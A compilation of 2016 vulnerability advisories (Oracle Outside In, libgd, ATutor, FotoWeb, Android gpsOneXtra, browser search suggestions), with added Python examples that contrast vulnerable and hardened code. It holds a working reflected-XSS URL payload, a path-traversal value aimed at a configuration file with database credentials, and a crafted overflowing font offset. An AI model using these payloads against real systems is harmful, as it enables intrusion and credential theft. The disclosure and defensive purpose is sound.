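    return [ENCODING_RECORD.unpack_from(cmap, CMAP_HEADER.size + i * ENCODING_RECORD.size)
            for i in range(num_tables)]


def offset_is_valid_overflowing(offset, table_len):
    """Assumed flawed idiom: add first, compare second. In 32-bit arithmetic
    offset + header_len wraps for offsets near UINT32_MAX, so the check
    passes although the subtable lies far outside the table."""
    return ((offset + SUBTABLE_HEADER_LEN) & UINT32_MAX) <= table_len


def offset_is_valid(offset, table_len):
    """Safe form: never add to attacker-controlled data; compare against the
    largest offset at which a subtable header still fits."""
    return table_len >= SUBTABLE_HEADER_LEN and offset <= table_len - SUBTABLE_HEADER_LEN


def subtable_headers(cmap, validator=offset_is_valid):
    """Walk every encoding record and read (format, length) of its subtable,
    rejecting records whose offset fails `validator`. With the overflowing
    validator, a hostile offset reaches unpack_from, which in Python raises
    struct.error; in C it would be an out-of-bounds read."""
    result = []
    for platform_id, encoding_id, offset in parse_encoding_records(cmap):
        if not validator(offset, len(cmap)):
            raise MalformedCmap("record (%d,%d) offset %#x out of range"
                                % (platform_id, encoding_id, offset))
        fmt, length = struct.unpack_from(">HH", cmap, offset)
        result.append((platform_id, encoding_id, offset, fmt, length))
    return result


def build_cmap(records, subtable=b"\x00\x04\x00\x20" + b"\x00" * 28):
    """Constructed sample: a cmap with the given encoding records followed by
    one 32-byte format-4 subtable (format=4, length=32)."""
    header = CMAP_HEADER.pack(0, len(records))
    body = b"".join(ENCODING_RECORD.pack(p, e, o) for p, e, o in records)
    return header + body + subtable


def benign_cmap():
    return build_cmap([(3, 1, CMAP_HEADER.size + ENCODING_RECORD.size)])


def malicious_cmap():
    # Offset chosen so that offset + 4 wraps to 2 in 32-bit arithmetic.
    return build_cmap([(3, 1, UINT32_MAX - 1)])


if __name__ == "__main__":
    print(subtable_headers(benign_cmap()))
    try:
        subtable_headers(malicious_cmap())
    except MalformedCmap as e:
        print("rejected:", e)
```

The safe validator subtracts from the trusted table length instead of adding
to the untrusted offset; that single change is what turns a wrap-around into
an ordinary out-of-range rejection.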

==
4) Solution

Apply update.
https://technet.microsoft.com/library/security/MS16-132

==
5) Time Table

2016/07/06 - Vendor notified about vulnerability.
2016/07/07 - Vendor response.
2016/07/20 - Vendor status update.
2016/11/08 - Release of vendor patch.
2016/11/08 - Release of Secunia Advisory SA69996.
2016/11/10 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Discovered by Hossein Lotfi, Secunia Research at Flexera Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2016-7210 identifier for the vulnerability.

==
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/
http://www.flexerasoftware.com/enterprise/products/
http://secunia.com/secunia_research/
http://secunia.com/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2016-16/

Complete list of vulnerability reports published by Secunia

Secunia Research: Oracle Outside In "GetTxObj()" Use-After-Free Vulnerability

2016-11-10 Thread Secunia Research
==

Secunia Research 2016/11/10

 Oracle Outside In "GetTxObj()" Use-After-Free Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused by a use-after-free error within the
"GetTxObj()" function (vsflw.dll), which can be exploited to corrupt
memory via a specially crafted PRZ file.

Successful exploitation may allow execution of arbitrary code.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2171485.1

==
5) Time Table

2016/06/09 - Vendor notified about a vulnerability when processing
 PRZ files.
2016/06/09 - Vendor response.
2016/06/10 - Vendor supplied bug ticket ID.
2016/06/26 - Vendor supplies information about the fix in the main
 codeline.
2016/06/28 - Vendor requests to reschedule public disclosure of the
 vulnerability.
2016/06/29 - Contacted the vendor with a new public disclosure date.
2016/10/18 - Release of vendor patch.
2016/10/19 - Release of Secunia Advisory SA65000.
2016/10/19 - Requested CVE information from the vendor.
2016/10/31 - Vendor responds with CVE identifiers.
2016/11/10 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Discovered by Behzad Najjarpour Jabbari, Secunia Research at
Flexera Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2016-5574 identifier for the vulnerability.

==
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/
http://www.flexerasoftware.com/enterprise/products/
http://secunia.com/secunia_research/
http://secunia.com/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website

Secunia Research: Oracle Outside In "VwStreamRead()" Buffer Overflow Vulnerability

2016-11-10 Thread Secunia Research
==

Secunia Research 2016/11/10

Oracle Outside In "VwStreamRead()" Buffer Overflow Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused by a boundary error within the
"VwStreamRead()" function (vssdw.dll), which can be exploited to cause
a heap-based buffer overflow via a specially crafted SDW file.

Successful exploitation may allow execution of arbitrary code.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2171485.1

==
5) Time Table

2016/05/26 - Vendor notified about a vulnerability when processing
 SDW files.
2016/05/26 - Vendor response.
2016/05/27 - Vendor supplies bug ticket ID.
2016/06/26 - Vendor supplies information about the fix in the main
 codeline.
2016/06/28 - Vendor requests to reschedule public disclosure of the
 vulnerability.
2016/06/29 - Contacted the vendor with a new public disclosure date.
2016/10/18 - Release of vendor patch.
2016/10/19 - Release of Secunia Advisory SA65000.
2016/10/19 - Requested CVE information from the vendor.
2016/10/31 - Vendor responds with CVE identifiers.
2016/11/10 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Discovered by Behzad Najjarpour Jabbari, Secunia Research at
Flexera Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2016-5558 identifier for the vulnerability.

==
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/
http://www.flexerasoftware.com/enterprise/products/
http://secunia.com/secunia_research/
http://secunia.com/advisories/

==
9) Verification

Please verify this advisory by visiti

Crashing Android devices with large Assisted-GPS Data Files [CVE-2016-5348]

2016-10-10 Thread Nightwatch Cybersecurity Research
Original at:
https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/

Summary

Android devices can be crashed remotely, forcing a halt and then a soft
reboot, by a MITM attacker manipulating the assisted GPS/GNSS data
provided by Qualcomm. This issue affects the open source code in AOSP
and proprietary code in a Java XTRA downloader provided by Qualcomm.
The Android issue was fixed in the October 2016 Android bulletin.
Additional patches were issued by Qualcomm for the proprietary client
in September 2016. This issue may also affect other platforms that use
Qualcomm GPS chipsets and consume these files, but that has not been
tested by us and requires further research.

Background – GPS and gpsOneXtra

Most mobile devices today include the ability to locate themselves on
the Earth’s surface using the Global Positioning System (GPS), a system
originally developed and currently maintained by the US military.
Similar systems developed and maintained by other countries exist as
well, including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou.
The GPS signals include an almanac which lists orbit and status
information for each of the satellites in the GPS constellation. This
allows receivers to acquire the satellites more quickly, since a
receiver does not need to search blindly for the location of each
satellite. Similar functionality exists for the other GNSS systems. To
solve the problem of almanac acquisition, Qualcomm developed the
gpsOneXtra system in 2007 (also known as IZat XTRA Assistance since
2013). This system lets GPS receivers download the almanac data over
the Internet from Qualcomm-operated servers. The format of these XTRA
files is proprietary but appears to contain current satellite location
data plus estimated locations for the next 7 days, as well as
additional information to improve signal acquisition. Most Qualcomm
mobile chipsets and GPS chips include support for this technology. A
related Qualcomm technology called IZat adds the ability to use WiFi
and cellular networks for location in addition to GPS.

Background – Android and gpsOneXtra Data Files

During our network monitoring of traffic originating from an Android
test device, we discovered that the device makes periodic calls to the
Qualcomm servers to retrieve gpsOneXtra assistance files. These
requests were performed almost every time the device connected to a
WiFi network. As discovered by our research and confirmed by the
Android source code, the following URLs were used:

http://xtra1.gpsonextra.net/xtra.bin
http://xtra2.gpsonextra.net/xtra.bin
http://xtra3.gpsonextra.net/xtra.bin

http://xtrapath1.izatcloud.net/xtra2.bin
http://xtrapath2.izatcloud.net/xtra2.bin
http://xtrapath3.izatcloud.net/xtra2.bin

WHOIS records show that both domains, gpsonextra.net and izatcloud.net,
are owned by Qualcomm. Further inspection of those URLs indicates that
both domains are hosted and served from Amazon’s CloudFront CDN service
(with the exception of xtra1.gpsonextra.net, which is served directly
by Qualcomm). On the Android platform, our inspection of the Android
source code shows that the file is requested by an OS-level Java
process (GpsXtraDownloader.java), which passes the data to a C++ JNI
class (com_android_server_location_GnssLocationProvider.cpp), which
then injects the files into the Qualcomm modem or firmware. We have not
inspected other platforms in detail, but suspect that a similar process
is used. Our testing was performed on Android v6.0, patch level of
January 2016, on a Motorola Moto G (2nd gen) GSM phone, and confirmed
on a Nexus 6P running Android v6.01 with May 2016 security patches.
Qualcomm has additionally performed testing on their proprietary Java
XTRA downloader client, confirming this vulnerability.

Vulnerability Details

The Android platform downloads XTRA data files automatically when
connecting to a new network. The download originates from a Java class
(GpsXtraDownloader.java), which passes the file to a C++/JNI class
(com_android_server_location_GnssLocationProvider.cpp), which in turn
injects it into the Qualcomm modem.

The vulnerability is that neither the Java nor the C++ code checks how
large the data file actually is. If a file is served that is larger
than the memory available on the device, all memory is exhausted and
the phone halts and then soft reboots. The soft reboot was sufficient
to recover from the crash and no data was lost. While we have not been
able to achieve remote code execution in either the Qualcomm modem or
the Android OS, this code path could potentially be exploited for such
attacks; that would require more research.

To attack, a MITM attacker located anywhere on the network between the
phone being attacked and Qualcomm’s servers can intercept the
legitimate requests from the phone and substitute their own, larger
files. Because the default Chrome
browser on Android reveals

Insecure transmission of data in Android applications developed with Adobe AIR [CVE-2016-6936]

2016-09-15 Thread research
Original at:
https://wwws.nightwatchcybersecurity.com/2016/09/14/advisory-insecure-transmission-of-data-in-android-applications-developed-with-adobe-air-cve-2016-6936/

Summary

Android applications developed with Adobe AIR send data back to Adobe servers 
without HTTPS while running. This can allow an attacker to compromise the 
privacy of the applications’ users. This has been fixed in Adobe AIR SDK 
release v23.0.0.257.

Details

Adobe AIR is a developer product which allows the same application code to be
compiled and run across multiple desktop and mobile platforms. While monitoring
network traffic during testing of several Android applications, we observed
traffic over plain HTTP (no SSL/TLS) going to several Adobe servers, including
the following:

- airdownload2.adobe.com
- mobiledl.adobe.com

Because encryption is not used, this would allow a network-level attacker to 
observe the traffic and compromise the privacy of the applications’ users.

This affects applications compiled with the Adobe AIR SDK versions 22.0.0.153 
and earlier.

Vendor Response

Adobe has released a fix for this issue on September 13th, 2016 in Adobe AIR 
SDK v23.0.0.257. Developers should update and rebuild their application using 
the latest SDK.

References

Adobe Security Bulletin: ASPB16-31
CVE: CVE-2016-6936

Timeline

2016-06-15: Report submitted to Adobe’s HackerOne program
2016-06-16: Report out of scope for this program, directed to Adobe’s PSIRT
2016-06-16: Submitted via email to Adobe’s PSIRT
2016-06-17: Reply received from PSIRT and a ticket number is assigned
2016-09-09: Response received from the vendor that the fix will be released 
next week
2016-09-13: Fix released
2016-09-14: Public disclosure


Secunia Research: LibGD "_gdContributionsAlloc()" Integer Overflow Denial of Service Vulnerability

2016-08-03 Thread Secunia Research
==

Secunia Research 03/08/2016

   LibGD "_gdContributionsAlloc()" Integer Overflow 
  Denial of Service Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

==
1) Affected Software

* LibGD version 2.2.2.
  Prior versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered a vulnerability in LibGD, which can
be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused by an integer overflow error within the
"_gdContributionsAlloc()" function (gd_interpolation.c) and can be
exploited to cause an out-of-bounds memory write or exhaust available
memory.
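The advisory names the function but not the arithmetic, so the following is
an added example, not libgd's code, of the allocation-size overflow class it
describes and of the checked-multiply pattern that closes it. The 32-bit
unsigned int model, the 8-byte entry size and the function names are
assumptions made for this example; the dimensions used to trigger the wrap are
constructed.

```python
UINT_MAX = 0xFFFFFFFF   # C `unsigned int`; 32 bits assumed for this example


class AllocationRefused(Exception):
    """Raised when a requested table size cannot be represented safely."""


def table_bytes_unchecked(line_length, window_size, entry_size=8):
    """Assumed shape of the unfixed arithmetic: element count and byte size
    are computed in unsigned 32-bit arithmetic and passed straight to the
    allocator. Attacker-chosen image dimensions make the product wrap, so
    the block is either far too small for the writes that follow or large
    enough to exhaust memory."""
    count = (line_length * window_size) & UINT_MAX
    return (count * entry_size) & UINT_MAX


def table_bytes_checked(line_length, window_size, entry_size=8, limit=UINT_MAX):
    """Hardened form: prove each product fits *before* performing it.
    Division cannot overflow, so `a > limit // b` is a safe test for
    `a * b > limit`."""
    if line_length <= 0 or window_size <= 0:
        raise AllocationRefused("non-positive dimension")
    if line_length > limit // window_size:
        raise AllocationRefused("line_length * window_size overflows")
    count = line_length * window_size
    if count > limit // entry_size:
        raise AllocationRefused("element count * entry size overflows")
    return count * entry_size


def bytes_written(line_length, window_size, entry_size=8):
    """The fill loop iterates over the original dimensions, not the wrapped
    count, so this is how far it writes into whatever was allocated."""
    return line_length * window_size * entry_size


def classify_unchecked(line_length, window_size):
    """Compare allocation size and write extent on the unchecked path."""
    allocated = table_bytes_unchecked(line_length, window_size)
    written = bytes_written(line_length, window_size)
    return "out-of-bounds write" if written > allocated else "ok"


if __name__ == "__main__":
    print(classify_unchecked(1000, 9))          # ok
    print(classify_unchecked(65536, 65537))     # 2^32 + 65536 wraps to 65536
    try:
        table_bytes_checked(65536, 65537)
    except AllocationRefused as e:
        print("refused:", e)
```

With line_length 65536 and window_size 65537 the true element count is
2^32 + 65536, which wraps to 65536: the unchecked path allocates 512 KiB and
then writes 32 GiB past it, while the checked path refuses before any
allocation happens.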

==
4) Solution

Update to version 2.2.3.

==
5) Time Table

03/07/2016 - Initial contact with vendor.
03/07/2016 - Vendor responds and confirms the issue and sends a patch.
07/07/2016 - Replied to the vendor the patch is incomplete.
13/07/2016 - CVE requested from Mitre.
13/07/2016 - Mitre assigns CVE-2016-6207 for the issue.
19/07/2016 - Vendor patches the issue in the source code repository.
19/07/2016 - Release of Secunia Advisory SA71416
22/07/2016 - Vendor releases fixed version 2.2.3.
03/08/2016 - Public disclosure of Research Advisory.

==
6) Credits

Discovered by Kasper Leigh Haabb, Secunia Research at Flexera
Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2016-6207 identifier for the vulnerability.

==
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2016-9/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Arbitrary File Content Disclosure in Atutor

2016-08-03 Thread High-Tech Bridge Security Research
Advisory ID: HTB23297
Product: Atutor
Vendor: Atutor
Vulnerable Version(s): 2.2.1 and probably prior
Tested Version: 2.2.1
Advisory Publication:  February 24, 2016  [without technical details]
Vendor Notification: February 24, 2016 
Vendor Patch: July 1, 2016 
Public Disclosure: August 2, 2016 
Vulnerability Type: Path Traversal [CWE-22]
Risk Level: Medium 
CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a path traversal 
vulnerability in Atutor, a popular web-based e-learning system. A remote 
attacker can view the contents of arbitrary local files on the target system 
with the privileges of the web server. 

The vulnerability may allow an attacker to gain access to potentially 
sensitive web application and system information, and to use the obtained 
data to gain complete control over the vulnerable web application.

Successful exploitation requires that the user is registered and 
authenticated, but registration is open by default.

The vulnerability exists due to the absence of filtering of user-supplied data 
passed via the "icon" HTTP POST parameter to the 
"/mods/_core/courses/users/create_course.php" script when saving information 
to the database. A remote authenticated attacker can use directory traversal 
sequences (e.g. "../") in the icon parameter to overwrite the stored value 
and then have the application read an arbitrary file from the system and 
return its contents.

The following PoC code can be used to replace the icon path stored in the 
database. In this example, we inject the path to the system configuration 
file "/include/config.inc.php":


<form action="http://[host]/mods/_core/courses/users/create_course.php"
method="POST" name="f1" enctype="multipart/form-data">
[form input fields missing from this copy of the advisory]
</form>

The injected parameter is used in the "readfile()" function in the 
"/get_course_icon.php" script. To view the contents of the 
"/include/config.inc.php" file and obtain the database credentials, the 
attacker needs to open the following URL:

http://[host]/get_course_icon.php?id=[COURSE_ID]
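The advisory shows the attacker's side; the following is an added example
(not ATutor's code) of the server-side pattern behind it and of the check
that would have stopped it, written in Python rather than PHP. The shape of
the vulnerable handler (directory joined to the stored value and read
directly, mirroring readfile()), the directory layout and the extension
allow-list are assumptions for this example, and the "config" file is
constructed with a fake credential.

```python
import os
import tempfile


class ForbiddenPath(Exception):
    """Raised when a stored icon path would escape the icon directory."""


# Only these extensions are served as course icons (assumed policy).
ICON_EXTENSIONS = {".png", ".gif", ".jpg", ".jpeg"}


def serve_icon_vulnerable(icon_dir, stored_icon):
    """Assumed shape of the flaw: the value saved from the "icon" field is
    joined to the icon directory and handed straight to readfile()."""
    with open(os.path.join(icon_dir, stored_icon), "rb") as f:
        return f.read()


def safe_icon_path(icon_dir, stored_icon):
    """Resolve the stored value and prove it still lies inside icon_dir.
    realpath() collapses "../" segments and symlinks on both sides, so the
    prefix comparison cannot be fooled by traversal or by a link planted in
    the icon directory; the extension allow-list keeps PHP and config files
    out even if one were somehow placed inside the directory."""
    base = os.path.realpath(icon_dir)
    target = os.path.realpath(os.path.join(base, stored_icon))
    if os.path.commonpath([base, target]) != base:
        raise ForbiddenPath("escapes icon directory: %r" % stored_icon)
    if os.path.splitext(target)[1].lower() not in ICON_EXTENSIONS:
        raise ForbiddenPath("not an image: %r" % stored_icon)
    return target


def serve_icon_hardened(icon_dir, stored_icon):
    with open(safe_icon_path(icon_dir, stored_icon), "rb") as f:
        return f.read()


def demo():
    """Build a throwaway tree shaped like the advisory's paths (constructed
    data, not a real ATutor install) and run both handlers on the traversal
    value an attacker would have stored via create_course.php."""
    root = tempfile.mkdtemp()
    icons = os.path.join(root, "images", "courses")
    os.makedirs(icons)
    os.makedirs(os.path.join(root, "include"))
    with open(os.path.join(icons, "course.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n")
    with open(os.path.join(root, "include", "config.inc.php"), "w") as f:
        f.write("<?php $db_password = 's3cret'; ?>\n")   # constructed secret

    traversal = "../../include/config.inc.php"
    leaked = serve_icon_vulnerable(icons, traversal)
    try:
        serve_icon_hardened(icons, traversal)
        blocked = False
    except ForbiddenPath:
        blocked = True
    return {
        "leaked_secret": b"s3cret" in leaked,
        "traversal_blocked": blocked,
        "legit_icon_served": serve_icon_hardened(icons, "course.png").startswith(b"\x89PNG"),
    }


if __name__ == "__main__":
    print(demo())
```

Note that the check is applied where the value is used, not only where it is
stored: the advisory's value reaches readfile() via the database, so input
filtering on create_course.php alone would still leave get_course_icon.php
trusting whatever is in the row.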


---

Solution:

Update to ATutor 2.2.2

More Information:
https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2

---

References:

[1] High-Tech Bridge Advisory HTB23297 - 
https://www.htbridge.com/advisory/HTB23297  - Arbitrary File Content Disclosure 
in Atutor
[2] Atutor - http://www.atutor.ca/ - ATutor is a FREE Open Source LMS, used to 
develop online courses and create elearning content.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



[S21SEC-047] Fotoware Fotoweb 8.0 Cross Site Scripting

2016-07-29 Thread S21sec Vulnerability Research
##

- S21Sec Advisory -
- S21SEC-047-en.txt -

##

     Title:  Fotoware Fotoweb 8.0 Cross Site Scripting (XSS)
        ID:  S21sec-047-en
  Severity:  Low
   History:  May.2016  Vulnerability discovered
             June.2016 Vendor contacted
             July.2016 Vendor patch acknowledged.
     Scope:  Cross Site Scripting XSS
 Platforms:  Any
    Author:  Miguel A. Hernandez / Departamento Auditoria S21sec.

   Release:  Public


[ SUMMARY ] 

Fotoweb is an enterprise-grade Digital Asset Management system (DMS).
A DMS provides a central repository of pictures and media files.

Unfiltered user-supplied data can lead to a reflected XSS vulnerability.
This allows an attacker to execute arbitrary JavaScript in the context of the
browser of a victim if the victim clicks on an attacker-supplied link or visits
an attacker-controlled website.

[ AFFECTED VERSIONS ] 

This vulnerability has been tested and found working on version 8.0.715.5753


[ DESCRIPTION ] 

Insufficient input validation allows JavaScript injection through the 'to'
parameter of the login page. The value is evidently reflected inside an inline
script: the payload below closes the string literal and block it lands in,
inserts its own statement, and re-opens a matching string so the script still
parses. Example:

http://fotowebserver/fotoweb/views/login?to=/fotoweb/%22;}%20else%20{%20alert%28%22S21sec%20XSS%22%29;%20}%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22
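Added example, not Fotoware's code: the advisory does not show the page
source, so the inline script below is an assumed reconstruction inferred from
the payload (a double-quoted string inside an if (inIframe()) {...} else {...}
block). The example decodes the advisory's own URL, renders it into that
script both raw and JSON-encoded, and uses a small string-literal scanner to
show which rendering lets alert() escape the literal.

```python
import json
import urllib.parse

# The advisory's payload, verbatim (the host name is the advisory's placeholder).
PAYLOAD_URL = (
    "http://fotowebserver/fotoweb/views/login?to=/fotoweb/%22;}%20else%20{%20alert"
    "%28%22S21sec%20XSS%22%29;%20}%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22"
)


def to_param(url):
    """Decode the 'to' value as the server would. Split manually: the payload
    contains a literal ';', which older parse_qs versions treat as a separator."""
    return urllib.parse.unquote(url.split("?to=", 1)[1])


def render_unsafe(to):
    """Assumed shape of the login page's inline script: the value sits inside
    a double-quoted literal and is interpolated raw."""
    return ('if (inIframe()) { var target = "' + to + '"; }'
            ' else { window.location = target; }')


def js_string_literal(value):
    """Serialise a value for a <script> context: JSON quoting plus the
    sequences JSON leaves intact that can still break out of a script."""
    return (json.dumps(value)
            .replace("</", "<\\/")
            .replace("\u2028", "\\u2028")
            .replace("\u2029", "\\u2029"))


def render_safe(to):
    return ('if (inIframe()) { var target = ' + js_string_literal(to) + '; }'
            ' else { window.location = target; }')


def code_outside_strings(script):
    """Minimal JS scanner: drop the contents of single- and double-quoted
    string literals (honouring backslash escapes) and return the rest, i.e.
    the characters the engine would execute as code."""
    out, in_str, quote, escaped = [], False, "", False
    for ch in script:
        if in_str:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == quote:
                in_str = False
        elif ch in "\"'":
            in_str, quote = True, ch
        else:
            out.append(ch)
    return "".join(out)


def is_injected(script, marker="alert("):
    """True if attacker-supplied code ended up outside every string literal."""
    return marker in code_outside_strings(script)


if __name__ == "__main__":
    to = to_param(PAYLOAD_URL)
    print(to)
    print("unsafe injected:", is_injected(render_unsafe(to)))
    print("safe injected:  ", is_injected(render_safe(to)))
```

The decoded value ends with `var relleno="`, which re-opens a string that the
page's own closing quote then terminates; that is why the injected script
stays syntactically valid and actually runs rather than throwing a parse error.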


[ WORKAROUND ] 

The reported vulnerability has been reviewed by Fotoware development team.
This issue is addressed in FotoWeb 8 Feature Release 8. 

[ ACKNOWLEDGMENTS ] 

This vulnerability has been found and researched by: 

   - Miguel A. Hernandez [ Departamento de Auditoria S21sec ]

We would like to acknowledge the assistance of Fotoware:   
   
   - John Fredrik Engeland [ Fotoware Support Manager ]

[ REFERENCES ] 

* Fotoware 
 http://fotoware.com

* S21sec 
  http://www.s21sec.com 

* S21sec Blog 
  http://blog.s21sec.com 




Crashing Browsers Remotely via Insecure Search Suggestions

2016-07-26 Thread research
[Original here:
https://wwws.nightwatchcybersecurity.com/2016/07/26/research-crashing-browsers-remotely-via-insecure-search-suggestions/]

Summary

Intercepting insecure search suggestion requests from browsers and
returning very large responses leads to browser crashes (but not RCE).
Affected browsers are Firefox on the desktop and Android, and Chrome on
desktop and Android; other Chromium- and Firefox-derived browsers may
be affected. Internet Explorer and Safari are not affected. The issue
is exploitable remotely, albeit not easily.

Details

Because browsers include multiple non-HTTPS search engines which also
use non-HTTPS endpoints, an attacker at the network level can intercept
the traffic flowing between the browser and the search engine endpoints
and substitute their own. If a very large response is returned (2+ GB),
the browser can run out of memory and crash. This is because browsers
do not check the size of search suggestion responses. Obviously, this
is more of an issue for mobile devices, which have less memory than
desktops. For the Android AOSP browser and Chromium, this issue appears
to be directly tied to the code that processes search engine responses.
For Firefox, this is a more generic issue around large XMLHttpRequest
responses, which is what the browser uses internally for search
suggestions. Our bug reports with the vendors provide more details on
which code is causing this. This reinforces the fact that network
traffic SHOULD NEVER be trusted.
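Both this issue and the gpsOneXtra one in the Android post above come down to
the same missing check: a client reads an untrusted HTTP body to completion
with no upper bound. The following is an added example, not code from either
post, AOSP or any browser, of the bounded reader such a client needs. The XTRA
size budget is an assumption for the example, and the lazily generated "4 GB"
body is a constructed stand-in for what a MITM would serve.

```python
import io


class ResponseTooLarge(Exception):
    """Raised when a response body exceeds the caller's size budget."""


# Budget for an XTRA file. The post gives no figure; this constant is an
# assumption for the example, not a value from AOSP or Qualcomm.
XTRA_MAX_BYTES = 256 * 1024
CHUNK = 64 * 1024


class LazyBody:
    """Constructed stand-in for a socket served by a MITM: yields `size`
    bytes on demand, so the example can model a multi-gigabyte response
    without ever materialising it."""

    def __init__(self, size):
        self.remaining = size

    def read(self, n=-1):
        if self.remaining <= 0:
            return b""
        if n < 0 or n > self.remaining:
            n = self.remaining
        self.remaining -= n
        return b"\x00" * n


def read_unbounded(stream):
    """The flawed pattern: read until EOF and keep everything. The attacker,
    not the caller, decides how much memory this allocates."""
    chunks = []
    while True:
        chunk = stream.read(CHUNK)
        if not chunk:
            break
        chunks.append(chunk)
    return b"".join(chunks)


def read_bounded(stream, max_bytes, declared_length=None):
    """Hardened reader. Reject early on an oversized Content-Length, but also
    count what actually arrives: the header may be absent (chunked
    encoding) or simply lie, so it is only a fast-fail hint."""
    if declared_length is not None and declared_length > max_bytes:
        raise ResponseTooLarge(
            "declared length %d exceeds limit %d" % (declared_length, max_bytes))
    buf = bytearray()
    while True:
        # Never ask for more than one byte past the budget, so the most this
        # reader can ever hold is max_bytes + 1.
        chunk = stream.read(min(CHUNK, max_bytes + 1 - len(buf)))
        if not chunk:
            return bytes(buf)
        buf += chunk
        if len(buf) > max_bytes:
            raise ResponseTooLarge("body exceeds limit %d" % max_bytes)


def fetch_xtra(stream, declared_length=None):
    """What a downloader should do with the body before handing it on to a
    lower layer (the JNI injector, or a suggestion parser): enforce the
    budget, then return the bytes."""
    return read_bounded(stream, XTRA_MAX_BYTES, declared_length)


if __name__ == "__main__":
    print(len(fetch_xtra(LazyBody(40 * 1024))))        # legitimate-sized file
    try:
        fetch_xtra(LazyBody(4 * 1024 ** 3))             # "4 GB" MITM response
    except ResponseTooLarge as e:
        print("rejected:", e)
```

The same cap, sized for a suggestion payload of a few kilobytes, is what a
browser's suggestion fetch would need; the transport fix (HTTPS to the
suggestion and XTRA endpoints) removes the MITM, but the size bound is what
removes the crash.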

The following crashes were observed; we have not been able to cause
an RCE or a buffer overflow:
- Android AOSP stock browser on Android (v4.4) – application crashes
- Chrome v51 on Android (v6.01) – application crashes
- Chrome v51 on desktop Linux (Ubuntu v16.04) – the entire computer
freezes and requires a reboot (this may be due to swapping being
disabled on an SSD drive)
- Firefox v47 on desktop Linux (Ubuntu v16.04) and Android (v6.01) –
application crashes

Safari v9.1 and Internet Explorer 11 and Edge appear not to be
affected, although a similar bug has happened before with Safari. We
did not test prior versions of either Safari or IE. We also did not
test any other browsers derived from Chromium or FireFox.

The practical exploitation of this issue is mitigated by several factors:
- The attacker must have control over DNS and the network traffic of
the victim machine. This is most likely in the case of a rogue WiFi
hotspot or a hacked router.
- Most browsers have a rather short timeout for the search engine
